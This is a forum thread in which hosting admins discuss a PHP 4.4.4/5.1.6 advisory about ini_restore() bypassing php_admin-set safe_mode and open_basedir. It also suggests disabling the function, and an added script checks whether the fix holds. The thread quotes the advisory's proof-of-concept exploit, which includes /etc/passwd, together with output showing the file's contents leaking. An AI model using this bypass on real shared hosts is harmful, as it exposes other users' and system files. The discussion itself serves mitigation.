denisdekat09

I read about this, but when I do easyapache I only see the version said to be vulnerable:

http://www.securiteam.com/unixfocus/5DP0B00JPA.html

Vulnerable Systems:
* PHP 5.1.6 / 4.4.4

Description:
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.

php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php
 

denisdekat09

Seems to also be an exploit with php and php_myadmin:

Exploit:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>

Exploit results:

/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

This issue is very dangerous, because the admin can't correctly set open_basedir or safe_mode for all users.


Titled: PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()

We got 4.4.4 php on our easyapache build...
 

jamesbond

What version would you like to get then? Of course, you could take the time to check www.php.net to see that those are actually the latest php versions out...
http://www.php.net/downloads.php

It seems the PHP developers are not concerned about safe_mode & open_basedir exploits these days.

Also, why not just disable ini_restore in php.ini?
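
An added example, not part of the thread or the advisory: a self-check to run through the web server inside a vhost whose open_basedir is set with php_admin_value, to confirm that disabling ini_restore (via the php.ini `disable_functions` directive) took effect and that the restriction survives. The function names `is_disabled` and `check_open_basedir_lock` are made up for this sketch.

```php
<?php
// Added example (not from the thread). It only compares ini values;
// it does not read any file outside the document root.

/** True if $fn appears in php.ini's disable_functions list. */
function is_disabled($fn)
{
    $raw  = (string) ini_get('disable_functions');
    $list = array_map('strtolower', array_map('trim', explode(',', $raw)));
    return in_array(strtolower($fn), $list, true);
}

/** Report whether the admin-set open_basedir can be reset from a script. */
function check_open_basedir_lock()
{
    $before = (string) ini_get('open_basedir');
    if ($before === '') {
        return 'FAIL: open_basedir is not set for this vhost';
    }

    // Older PHP keeps a stub for disabled functions, newer PHP removes
    // them from the function table, so test both conditions.
    if (is_disabled('ini_restore') || !function_exists('ini_restore')) {
        return 'OK: ini_restore() is disabled; open_basedir=' . $before;
    }

    // ini_restore() is callable: see whether it undoes php_admin_value.
    // Any change lasts only for the remainder of this request.
    ini_restore('open_basedir');
    $after = (string) ini_get('open_basedir');

    if ($after !== $before) {
        return "FAIL: ini_restore() changed open_basedir from '$before' to '$after'";
    }
    return 'OK: open_basedir survived ini_restore(); value=' . $before;
}

header('Content-Type: text/plain');
echo 'PHP ', PHP_VERSION, "\n", check_open_basedir_lock(), "\n";
```

Run it once before and once after adding `disable_functions = ini_restore` to php.ini and restarting Apache; a FAIL on the first run and OK on the second confirms the workaround is active for that vhost.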